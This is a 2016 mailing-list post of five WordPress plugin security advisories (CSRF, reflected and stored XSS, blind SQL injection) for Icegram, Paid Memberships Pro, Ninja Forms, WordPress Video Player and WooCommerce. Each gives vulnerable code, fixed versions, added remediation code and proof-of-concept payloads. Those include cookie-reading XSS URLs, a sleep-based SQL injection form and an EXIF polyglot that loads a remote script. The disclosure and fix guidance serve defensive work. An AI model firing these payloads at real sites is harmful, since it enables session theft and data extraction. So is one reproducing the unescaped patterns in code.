Date: Wed, 20 Jul 2016 18:26:24 +0200
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities affecting five WordPress Plugins (XSS, CSRF & SQLi)

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.



------------------------------------------------------------------------
Cross-Site Request Forgery in Icegram WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability was found in the Icegram
WordPress Plugin. This issue allows an attacker to overwrite any
WordPress option with the value true. An attacker may use this issue to
enable (vulnerable) WordPress features that are disabled in the target
site.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0032

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Icegram - Popups, Optins, CTAs
& lot more... [2] WordPress Plugin version 1.9.18.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Icegram 1.9.19 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Icegram [2] WordPress Plugin allows creating beautiful popups,
hellobars, slide-ins & notifications, and capturing leads, with instant
results and awesome support. A Cross-Site Request Forgery vulnerability
exists in Icegram that allows an attacker to overwrite any WordPress
option with the value true. An attacker may use this issue to enable
(vulnerable) WordPress features that are disabled in the target site.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerability exists in the file icegram.php. As can be seen in the
code fragment below, the plugin reads the value of the option_name URL
parameter and uses this value as the key passed to update_option(), with
no nonce check and no restriction on which option may be named. This
allows an attacker to create a link that overwrites an arbitrary
WordPress option. The value of the target option will be set to true.

update_option($_GET['option_name'], true);

In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious link. If a logged in
Administrator opens the following URL, the ability for users to register
will be enabled:

http://<target>/wp-admin/edit.php?dismiss_admin_notice=1&option_name=users_can_register
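The two controls that close this class of issue, as an added example that is not Icegram's own code (function names, the option allowlist and the nonce action name are hypothetical): the request must carry a nonce bound to the logged-in user, and the option name is looked up in a fixed allowlist of dismissal flags instead of being taken straight from $_GET.

```php
<?php
// Added example (not Icegram's code): a hardened admin-notice dismissal
// handler for WordPress. Two changes close the CSRF issue described above:
//  1. the request must carry a nonce tied to the logged-in user, so a link
//     planted on a third-party site cannot trigger the action;
//  2. the option name is matched against a fixed allowlist of dismissal
//     flags, so no unrelated option (e.g. users_can_register) can be set.

// Hypothetical allowlist: the only options this handler may ever write.
function example_dismissible_notice_options() {
    return array(
        'example_notice_welcome_dismissed',
        'example_notice_upgrade_dismissed',
    );
}

// Builds the link the notice renders. The nonce action includes the option
// name, so a nonce issued for one notice cannot be replayed against another.
function example_dismiss_notice_url( $option_name ) {
    $url = add_query_arg(
        array( 'dismiss_admin_notice' => '1', 'option_name' => $option_name ),
        admin_url( 'edit.php' )
    );
    return wp_nonce_url( $url, 'example_dismiss_' . $option_name, '_dnonce' );
}

function example_handle_dismiss_notice() {
    if ( empty( $_GET['dismiss_admin_notice'] ) || empty( $_GET['option_name'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    // sanitize_key() reduces the value to [a-z0-9_-]; the allowlist check
    // then rejects anything that is not a known dismissal flag.
    $option_name = sanitize_key( wp_unslash( $_GET['option_name'] ) );
    if ( ! in_array( $option_name, example_dismissible_notice_options(), true ) ) {
        wp_die( 'Unknown notice.', 'Bad request', array( 'response' => 400 ) );
    }
    // check_admin_referer() terminates the request when the nonce is
    // missing, expired, or was issued for another user or action.
    check_admin_referer( 'example_dismiss_' . $option_name, '_dnonce' );

    update_option( $option_name, true );
}
add_action( 'admin_init', 'example_handle_dismiss_notice' );
```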
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_icegram_wordpress_plugin.html
[2] https://wordpress.org/plugins/icegram/
[3] https://downloads.wordpress.org/plugin/icegram.1.9.19.zip
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Paid Memberships Pro WordPress
Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Paid Memberships
Pro WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160714-0015

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Paid Memberships Pro [2] WordPress
Plugin version 1.8.9.3.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in commit d39a18b [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Cross-Site Scripting (XSS) attacks are a type of injection, in which
malicious scripts are injected into otherwise benign and trusted web
sites. XSS attacks occur when an attacker uses a web application to send
malicious code, generally in the form of a browser side script, to a
different end user. Flaws that allow these attacks to succeed are quite
widespread and occur anywhere a web application uses input from a user
within the output it generates without validating or encoding it.
Reflected XSS occurs when user input is immediately returned by a web
application in an error message, search result, or any other response
that includes some or all of the input provided by the user as part of
the request.

The "plugin_status" request parameter is neither validated (for example,
<script> tags are not rejected) nor output-encoded before it is echoed.
The relevant lines in paid-memberships-pro/adminpages/addons.php are:

33: $status = $_REQUEST['plugin_status'];
72: echo admin_url("admin.php?page=pmpro-addons&force-check=1&plugin_status=" . $status);

An attacker needs to lure a logged-in admin to follow the link in the
proof of concept below. 

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
http://<targetsite>/wp-admin/admin.php?page=pmpro-addons&plugin_status=foofoo%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3Ca
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_paid_memberships_pro_wordpress_plugin.html
[2] https://wordpress.org/plugins/paid-memberships-pro/
[3]
https://github.com/strangerstudios/paid-memberships-pro/commit/d39a18b3e9fd373665a23e5e79e8caff77a3e7f4
------------------------------------------------------------------------
Multiple Cross-Site Scripting vulnerabilities in Ninja Forms WordPress
Plugin
------------------------------------------------------------------------
Han Sahin, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Multiple reflected Cross-Site Scripting (XSS) vulnerabilities have been
found in the Ninja Forms WordPress Plugin. By using this issue an
attacker can inject malicious JavaScript code into the application,
which will execute within the browser of any user who views the relevant
application content. 

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160714-0017

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Ninja Forms WordPress Plugin [2]
version 2.9.51.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Ninja Forms v2.9.52 (18 July 2016) [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WordPress Ninja Forms plugin [2] is a plugin that simplifies
creating forms and managing submissions. Multiple reflected Cross-Site
Scripting vulnerabilities have been discovered in the WordPress Ninja
Forms plugin that allow an unauthenticated attacker to inject malicious
JavaScript code into the application, which will execute within the
browser of any user who views the relevant application content. The
attacker-supplied code can perform a wide variety of actions, such as
stealing victims' session tokens or login credentials, performing
arbitrary actions on their behalf, logging their keystrokes, or
delivering malware.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The WordPress Ninja Forms plugin performs insufficient CSRF validation
(ajax referer and nonce checks) and fails to perform context-aware output
encoding at the points where user-supplied input is copied into
application responses. The vulnerability resides at least in the
admin-ajax.php and edit.php page actions of the Ninja Forms plugin. As a
result, script code supplied in the request is executed in the browser
of the user who opens it.

Authenticated WP-Admins can be induced to issue the attacker's crafted
request in various ways. For example, the attacker can send a victim a
link containing a malicious URL or they can create an innocuous looking
web site that causes anyone viewing it to make arbitrary cross-domain
requests to the vulnerable application (using GET).

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
These vulnerabilities can be demonstrated by submitting the following
requests to the form_id parameter of the admin-ajax.php and edit.php
pages respectively:
/wp-admin/admin-ajax.php?step=4&total_steps=6&args[form_id]=1lxmjg<img src%3daonerror%3dalert(document.cookie)>meiij&args[filename]=kllk'<&action=nf_download_all_subs

/wp-admin/edit.php?post_status=all&post_type=nf_sub&action=-1&m=0&form_id=1'><script>alert(`SumOfPwn.nl`)<%2Fscript>&paged=1&mode=list&action2=-1

Please note that the other parameters in these requests are also
vulnerable.
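The same two defects underlie the Paid Memberships Pro and Ninja Forms findings above: a request value is reflected without being constrained or escaped for its output context, and the admin-ajax action accepts requests that carry no nonce. The following is an added example, not the code of either plugin (function names, the status allowlist and the nonce action are hypothetical), showing how each is closed.

```php
<?php
// Added example (not the code of either plugin). Values are constrained
// before they are reflected, escaped for the exact context they are
// written into, and the ajax action verifies a nonce before doing anything.

// --- Paid Memberships Pro case: plugin_status reflected into an href ----
function example_plugin_status_from_request() {
    $allowed = array( 'all', 'active', 'inactive', 'update-available' ); // hypothetical
    $raw     = isset( $_REQUEST['plugin_status'] ) ? wp_unslash( $_REQUEST['plugin_status'] ) : 'all';
    $status  = sanitize_key( $raw );
    // Unknown values fall back to the default instead of being echoed.
    return in_array( $status, $allowed, true ) ? $status : 'all';
}

function example_force_check_link_html() {
    $url = add_query_arg(
        array(
            'page'          => 'pmpro-addons',
            'force-check'   => '1',
            'plugin_status' => example_plugin_status_from_request(),
        ),
        admin_url( 'admin.php' )
    );
    // esc_url() for the attribute, esc_html() for the text node: a value
    // containing a quote or '>' can no longer terminate the attribute or tag.
    return '<a href="' . esc_url( $url ) . '">' . esc_html__( 'Check again', 'example' ) . '</a>';
}

// --- Ninja Forms case: args[form_id] reflected by an admin-ajax action ---
function example_download_subs_handler() {
    // Terminates the request unless it carries a nonce minted by
    // wp_create_nonce( 'example_download_subs' ) for the current user; this
    // is what stops a cross-site GET from triggering the action.
    check_ajax_referer( 'example_download_subs', 'security' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }
    $args = isset( $_REQUEST['args'] ) && is_array( $_REQUEST['args'] ) ? $_REQUEST['args'] : array();
    // form_id is numeric by definition; absint() leaves no room for markup.
    $form_id = isset( $args['form_id'] ) ? absint( $args['form_id'] ) : 0;
    if ( 0 === $form_id ) {
        wp_send_json_error( array( 'message' => 'missing form_id' ), 400 );
    }
    $filename = isset( $args['filename'] ) ? sanitize_file_name( wp_unslash( $args['filename'] ) ) : 'export.csv';
    // Sanitized values are still escaped for the HTML context they land in.
    printf( '<p>%s</p>', esc_html( sprintf( 'Exporting form %d to %s', $form_id, $filename ) ) );
    wp_die();
}
add_action( 'wp_ajax_example_download_subs', 'example_download_subs_handler' );
```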
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/multiple_cross_site_scripting_vulnerabilities_in_ninja_forms_wordpress_plugin.html
[2] https://wordpress.org/plugins/ninja-forms/
[3] https://wordpress.org/plugins/ninja-forms/changelog/
------------------------------------------------------------------------
Multiple SQL injection vulnerabilities in WordPress Video Player
------------------------------------------------------------------------
David Vaartjes & Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that WordPress Video Player is affected by multiple
blind SQL injection vulnerabilities. Using these issues it is possible
for a logged on Contributor (or higher) to extract arbitrary data (e.g.,
the Administrator's password hash) from the WordPress database.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0004

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WordPress Video Player [2]
WordPress plugin version 1.5.16.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in WordPress Video Player 1.5.18 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
WordPress Video Player is a WordPress video plugin that allows you to
easily add videos to your website. WordPress Video Player is affected by
multiple blind SQL injection vulnerabilities. Using these issues it is
possible for a logged on Contributor (or higher) to extract arbitrary
data (e.g., the Administrator's password hash) from the WordPress
database.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerabilities exist in the functions show_tag(),
spider_video_select_playlist(), and spider_video_select_video(). The
author tried to prevent SQL injection by calling the esc_sql() [4]
WordPress function. However, the user input is used in the ORDER BY
clause and is consequently not quoted. Because esc_sql() only escapes
characters that matter inside a quoted string, it is possible to inject
arbitrary SQL statements despite its use.

show_tag():

[...]
	
if (isset($_POST['page_number'])) {
	if ($_POST['asc_or_desc']) {
		$sort["sortid_by"] =
esc_sql(esc_html(stripslashes($_POST['order_by'])));
		if ($_POST['asc_or_desc'] == 1) {
			$sort["custom_style"] = "manage-column column-title sorted asc";
			$sort["1_or_2"] = "2";
			$order = "ORDER BY " . $sort["sortid_by"] . " ASC";
		} else {
			$sort["custom_style"] = "manage-column column-title sorted desc";
			$sort["1_or_2"] = "1";
			$order = "ORDER BY " . $sort["sortid_by"] . " DESC";
		}
	}
 
spider_video_select_playlist():

[...]
if(isset($_POST['page_number']))
{
	if($_POST['asc_or_desc'])
	{
		$sort["sortid_by"]=esc_sql(esc_html(stripslashes($_POST['order_by'])));
		if($_POST['asc_or_desc']==1)
		{
			$sort["custom_style"]="manage-column column-title sorted asc";
			$sort["1_or_2"]="2";
			$order="ORDER BY ".$sort["sortid_by"]." ASC";
		}
		else
		{
			$sort["custom_style"]="manage-column column-title sorted desc";
			$sort["1_or_2"]="1";
			$order="ORDER BY ".$sort["sortid_by"]." DESC";
		}
	}

function spider_video_select_video():

[...]
	
if(isset($_POST['page_number']))
{
		if($_POST['asc_or_desc'])
		{
			$sort["sortid_by"]=esc_html(stripslashes($_POST['order_by']));
			if($_POST['asc_or_desc']==1)
			{
				$sort["custom_style"]="manage-column column-title sorted asc";
				$sort["1_or_2"]="2";
				$order="ORDER BY ".esc_sql($sort["sortid_by"])." ASC";
			}
			else
			{
				$sort["custom_style"]="manage-column column-title sorted desc";
				$sort["1_or_2"]="1";
				$order="ORDER BY ".esc_sql($sort["sortid_by"])." DESC";
			}
		}
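
Why esc_sql() does not help here, and what does, as an added example that is not the plugin's code (function names, the column mapping and the table name are hypothetical): an ORDER BY clause is built only from an allowlist of column names and a direction derived by comparison, so no request byte is ever interpolated into the SQL string, and the unquoted LIMIT/OFFSET values go through $wpdb->prepare().

```php
<?php
// Added example, not the plugin's code. esc_sql() only escapes the
// characters that matter inside a quoted string (quotes, backslashes,
// NUL, newlines). An ORDER BY expression such as the order_by value in
// the proof of concept below contains none of them, so it reaches the
// database unchanged. This check makes that visible (constructed input).
function example_esc_sql_is_noop_here( $order_by ) {
    return esc_sql( $order_by ) === $order_by;
}

// Hypothetical mapping from the sort keys the UI offers to real columns.
function example_sortable_columns() {
    return array(
        'id'    => 'id',
        'title' => 'title',
        'date'  => 'created_at',
    );
}

// Builds "ORDER BY <column> <dir>" from two untrusted request values.
// A key that is not in the allowlist falls back to a fixed default rather
// than being interpolated, and the direction is the result of a
// comparison, so the request never contributes a single byte to the SQL.
function example_order_clause( $order_by, $asc_or_desc, $default = 'id' ) {
    $columns = example_sortable_columns();
    $key     = sanitize_key( $order_by );
    $column  = isset( $columns[ $key ] ) ? $columns[ $key ] : $columns[ $default ];
    $dir     = ( '1' === (string) $asc_or_desc ) ? 'ASC' : 'DESC';
    return 'ORDER BY `' . $column . '` ' . $dir;
}

// LIMIT/OFFSET are also never quoted; they go through $wpdb->prepare()
// with %d placeholders instead of string concatenation.
function example_playlist_query( $wpdb, $order_by, $asc_or_desc, $page_number, $per_page = 20 ) {
    $order = example_order_clause( $order_by, $asc_or_desc );
    return $wpdb->prepare(
        "SELECT id, title FROM {$wpdb->prefix}example_playlists {$order} LIMIT %d OFFSET %d",
        $per_page,
        max( 0, (int) $page_number ) * $per_page
    );
}
```

With the proof-of-concept order_by value, example_esc_sql_is_noop_here() returns true, while example_order_clause() yields "ORDER BY `id` ASC" because the key is not in the allowlist.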

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/admin-ajax.php?action=spiderVeideoPlayerselectplaylist" method="POST">
			<input type="hidden" name="search_events_by_title" value="" />
			<input type="hidden" name="page_number" value="0" />
			<input type="hidden" name="serch_or_not" value="" />
			<input type="hidden" name="asc_or_desc" value="1" />
			<input type="hidden" name="order_by" value="(CASE WHEN (SELECT sleep(10)) = 1 THEN id ELSE title END) ASC #" />
			<input type="hidden" name="option" value="com_Spider_Video_Player" />
			<input type="hidden" name="task" value="select_playlist" />
			<input type="hidden" name="boxchecked" value="0" />
			<input type="hidden" name="filter_order_playlist" value="" />
			<input type="hidden" name="filter_order_Dir_playlist" value="" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/multiple_sql_injection_vulnerabilities_in_wordpress_video_player.html
[2] https://wordpress.org/plugins/player/
[3] https://downloads.wordpress.org/plugin/player.1.5.18.zip
[4] https://codex.wordpress.org/Function_Reference/esc_sql
------------------------------------------------------------------------
Persistent Cross-Site Scripting in WooCommerce using image metadata
(EXIF)
------------------------------------------------------------------------
Han Sahin, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A persistent Cross-Site Scripting (XSS) vulnerability has been found in
the WooCommerce WordPress Plugin (millions of active installations). An
attacker can create a specially crafted image file which, when uploaded
as a product image in WordPress, injects malicious JavaScript code into
the application. An attacker can use this vulnerability to perform a
wide variety of actions, such as stealing victims' session tokens or
login credentials, and performing arbitrary actions on their behalf.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160720-0006

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WooCommerce [2] version 2.6.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in WooCommerce 2.6.3 [3] (Release Notes [4]).

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
WooCommerce [5] is a free eCommerce plugin for WordPress. It is the
world's favorite eCommerce solution that gives both store owners and
developers complete control. A persistent Cross-Site Scripting (XSS)
vulnerability has been found in the WooCommerce WordPress Plugin
(millions of active installations). An attacker can create a specially
crafted image file which, when uploaded as a product image in WordPress,
injects malicious JavaScript code into the application. An attacker can
use this vulnerability to perform a wide variety of actions, such as
stealing victims' session tokens or login credentials, and performing
arbitrary actions on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
WooCommerce uses meta data from an image file to fill in the 'Caption'
section of an uploaded image in WordPress. Meta data of an image must be
treated as untrusted user input and can be manipulated using an
Exchangeable Image File Format (EXIF) editor. A vulnerability was found
in the way WooCommerce processes meta data (Caption). Using a specially
crafted image it is possible to trigger a Cross-Site Scripting condition
in WooCommerce.

It is difficult for a WP admin to determine whether an image contains
malicious meta data. An attacker can craft a popular image carrying a
Cross-Site Scripting payload in its meta data, spread it via social
media, and rely on WooCommerce using that meta data as the Caption. When
an admin uploads this image as a product image or gallery item without
checking the meta data, the malicious script is injected into the
WooCommerce site. An attacker can use this vulnerability to perform a
wide variety of actions, such as stealing victims' session tokens or
login credentials, and performing arbitrary actions on their behalf.

The code fragment below shows that meta data is used for the caption and
title of an image.

function wc_rest_set_uploaded_image_as_attachment( $upload, $id = 0 ) {
	$info    = wp_check_filetype( $upload['file'] );
	$title   = '';
	$content = '';
	
	if ( ! function_exists( 'wp_generate_attachment_metadata' ) ) {
		include_once( ABSPATH . 'wp-admin/includes/image.php' );
	}
	
	if ( $image_meta = wp_read_image_metadata( $upload['file'] ) ) {
		if ( trim( $image_meta['title'] ) && ! is_numeric( sanitize_title( $image_meta['title'] ) ) ) {
			$title = $image_meta['title'];
		}
		if ( trim( $image_meta['caption'] ) ) {
			$content = $image_meta['caption'];
		}
	}
	
	$attachment = array(
		'post_mime_type' => $info['type'],
		'guid'           => $upload['url'],
		'post_parent'    => $id,
		'post_title'     => $title,
		'post_content'   => $content,
	);
	
	$attachment_id = wp_insert_attachment( $attachment, $upload['file'], $id );
	if ( ! is_wp_error( $attachment_id ) ) {
		wp_update_attachment_metadata( $attachment_id, wp_generate_attachment_metadata( $attachment_id, $upload['file'] ) );
	}
	return $attachment_id;
}

As seen in the code listing below the output of the meta data is not
properly encoded, resulting in persistent Cross-Site Scripting.

<div class="images">
	<?php
		if ( has_post_thumbnail() ) {
			$attachment_count = count( $product->get_gallery_attachment_ids() );
			$gallery          = $attachment_count > 0 ? '[product-gallery]' : '';
			$props            = wc_get_product_attachment_props( get_post_thumbnail_id(), $post );
			$image            = get_the_post_thumbnail( $post->ID, apply_filters( 'single_product_large_thumbnail_size', 'shop_single' ), array(
				'title' => $props['title'],
				'alt'   => $props['alt'],
			) );
			echo apply_filters( 'woocommerce_single_product_image_html', sprintf( '<a href="%s" itemprop="image" class="woocommerce-main-image zoom" title="%s" data-rel="prettyPhoto' . $gallery . '">%s</a>', $props['url'], $props['caption'], $image ), $post->ID );
		} else {
			echo apply_filters( 'woocommerce_single_product_image_html', sprintf( '<img src="%s" alt="%s" />', wc_placeholder_img_src(), __( 'Placeholder', 'woocommerce' ) ), $post->ID );
		}
		do_action( 'woocommerce_product_thumbnails' );
	?>
</div>

------------------------------------------------------------------------
Reproduction
------------------------------------------------------------------------
The following two images can be used to reproduce this issue:

- Product image [6]
- Gallery image [7]

It is also possible to craft your own malicious image using an EXIF
editor; the following payloads can be used:

Product image:

jaVasCript:/*-/*`/*\`/*'/*"/**/(/*
*/oNcliCk='s=document.createElement(`script`);s.src=`https://sumofpwn.nl/js/jquery.js`;document.body.appendChild(s)
'//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Gallery image:

<a href="javascript&#58alert(document.cookie);">Click for new Pokemon
game</a>
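
How a store owner or plugin developer can treat image metadata as the untrusted input it is, as an added example that is not WooCommerce's code (function names and the suspicious-pattern heuristic are hypothetical): the title and caption read from the file are reduced to plain text before they are stored, a review helper flags raw metadata that carries markup or a script scheme, and the rendered attributes are escaped regardless.

```php
<?php
// Added example, not WooCommerce's code: image metadata is treated as
// untrusted on the way in and escaped on the way out.

// Reads the same 'title' and 'caption' fields wp_read_image_metadata()
// returns and reduces them to plain text before they become the
// attachment's post_title / post_content. sanitize_text_field() strips
// tags, so the <a> element of the gallery payload above is reduced to its
// link text; what remains still needs escaping when it is rendered.
function example_sanitized_image_meta( $file ) {
    $meta = wp_read_image_metadata( $file );
    if ( ! $meta ) {
        return array( 'title' => '', 'caption' => '' );
    }
    return array(
        'title'   => sanitize_text_field( $meta['title'] ),
        'caption' => sanitize_text_field( $meta['caption'] ),
    );
}

// Review helper for site owners: true when a raw metadata value carries
// markup, an event-handler attribute or a javascript scheme, so the image
// can be inspected before it is published. A heuristic (constructed
// patterns), not a filter: sanitizing and escaping are what neutralise it.
function example_image_meta_looks_suspicious( $raw_value ) {
    return false !== strpos( $raw_value, '<' )
        || false !== stripos( $raw_value, 'javascript' )
        || 1 === preg_match( '/on[a-z]+\s*=/i', $raw_value );
}

// Rendering: every value is escaped for the attribute it lands in, even
// though new uploads are sanitized, because attachments stored before the
// sanitizer existed remain in the media library. $props follows the keys
// of wc_get_product_attachment_props() used in the listing above.
function example_main_image_html( $props, $image_html, $gallery ) {
    return sprintf(
        '<a href="%s" itemprop="image" class="woocommerce-main-image zoom" title="%s" data-rel="%s">%s</a>',
        esc_url( $props['url'] ),
        esc_attr( $props['caption'] ),
        esc_attr( 'prettyPhoto' . $gallery ),
        $image_html // produced by get_the_post_thumbnail(), which escapes its own attributes
    );
}
```

Both payloads listed above trip example_image_meta_looks_suspicious(): the product-image string contains "jaVasCript" and "oNcliCk=", and the gallery string contains "<".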

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_woocommerce_using_image_metadata__exif_.html
[2] https://wordpress.org/plugins/woocommerce/developers/
[3] https://downloads.wordpress.org/plugin/woocommerce.2.6.3.zip
[4]
https://woocommerce.wordpress.com/2016/07/19/woocommerce-2-6-3-fixsecurity-release-notes/
[5] https://wordpress.org/plugins/woocommerce/
[6] https://sumofpwn.nl/advisory/2016/SumOfPwn_productimage.jpg
[7] https://sumofpwn.nl/advisory/2016/WinPokemonGO_gallery_item.jpg
